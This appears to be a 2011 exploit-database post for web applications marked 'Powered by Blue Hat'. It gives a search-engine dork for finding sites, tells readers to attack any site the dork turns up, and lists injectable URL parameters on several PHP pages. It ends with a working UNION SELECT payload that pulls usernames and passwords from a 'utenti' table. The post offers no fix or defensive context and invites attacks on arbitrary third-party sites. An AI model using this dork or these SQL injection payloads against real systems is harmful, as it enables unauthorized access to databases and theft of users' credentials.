36 lines
No EOL
1.4 KiB
Text
36 lines
No EOL
1.4 KiB
Text
#(+)Exploit Title: Powered by Blue Hat Sensitive Database Disclosure Vulnerability
|
|
#(+)Author : ^Xecuti0n3r
|
|
#(+) Date : 12.04.2011
|
|
#(+) Hour : 13:37 PM
|
|
#(+) E-mail : xecuti0n3r()yahoo.com
|
|
#(+) dork : intext:"Powered by Blue Hat"
|
|
#(+) Category : Web Apps [SQli]
|
|
|
|
____________________________________________________________________
|
|
____________________________________________________________________
|
|
|
|
Choose any site that comes up when you enter the dork intext:"Powered by Blue Hat" in search engine
|
|
|
|
|
|
*SQL injection Vulnerability*
|
|
|
|
|
|
# [+]http://site.com/video.php?id_att='111
|
|
# [+]http://site.com/video.php?id_att=[SQLI]
|
|
# [+]http://site.com/mappa.php?id_att='2121
|
|
# [+]http://site.com/mappa.php?id_att=[SQLI]
|
|
# [+]http://site.com/elenco_attivita.php?id_cat='101
|
|
# [+]http://site.com/elenco_attivita.php?id_cat=[SQLI]
|
|
# [+]http://site.com/prodotti.php?id='6
|
|
# [+]http://site.com/prodotti.php?id=[SQLI]
|
|
# [+]http://site.com/prodotti.php?id=-6+union+select+1,concat(username,0x3a,password)+from+utenti
|
|
|
|
|
|
|
|
____________________________________________________________________
|
|
____________________________________________________________________
|
|
|
|
########################################################################
|
|
(+)Exploit Coded by: ^Xecuti0n3r
|
|
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
|
|
######################################################################## |